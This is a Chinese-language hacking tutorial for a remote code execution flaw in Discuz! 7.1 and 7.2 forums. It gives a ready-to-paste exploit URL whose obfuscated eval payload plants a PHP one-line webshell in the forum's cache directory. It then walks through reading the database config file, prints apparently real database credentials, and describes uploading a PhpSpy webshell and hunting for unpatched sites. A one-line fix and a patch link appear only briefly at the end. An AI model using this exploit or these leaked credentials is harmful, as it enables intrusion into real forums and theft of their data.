找到一个论坛,注册一个账号
注册好后,使用exp
复制以下代码:
http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
以上为exp
如若此处为空白,说明成功
存在该文件
php一句话连接forumdata/cache/usergroup_01.php
读取数据库连接文件
在模块中选择读取文件,并输入数据库连接文件的地址“****/dc/config.inc.php”,如图8所示,成功获取该论坛数据库的敏感信息:
$dbhost = 'localhost'; // 数据库服务器
$dbuser = 'skycheer'; // 数据库用户名
$dbpw = 'sky0127'; // 数据库密码
$dbname = 'skycheer'; // 数据库名
$pconnect = 0;
上传大马
使用一句话管理实在是不方便,在功能模块中选择上传文件,使用空的路径直接将本地的大马上传到一句话木马所在的路径,上传成功后直接访问,如图9所示,成功得到我们熟悉的PhpSpy ver 2008界面。至此已经获取Discuz!7.2版本的Webshell,大家都知道Discuz!论坛的Webshell很难拿到,因此本漏洞的珍稀程度可想而知。
Discuz!7.1&7.2远程溢出漏洞出来后,国内有关Discuz!的大中小论坛基本没有什么幸免,安全做的好的去掉了cache的执行权限,将其权限设置为无,逃过劫难。
友情提示:非法入侵他人站点,一切后果自负 上文出自77169 /techweb
利用:注册后登陆 misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} 任意执行。
DZ 7.1、7.2 针对getshell的修复方法:
在common.inc.php上面加上$response=$scriptlang=array();
这个洞t00ls团队发现的,DZ官方已经被人日过了。
官方补丁:http://www.discuz.net/thread-1537673-1-1.html
=============================================================================
截止到今天有这个洞的Dz论坛已经很少了,我刚才在谷歌翻了几篇,只找到一个有洞的,
其他的都补上了,可惜的是这个有洞的论坛用一句话连接后居然不显示文件路径,真是杯具!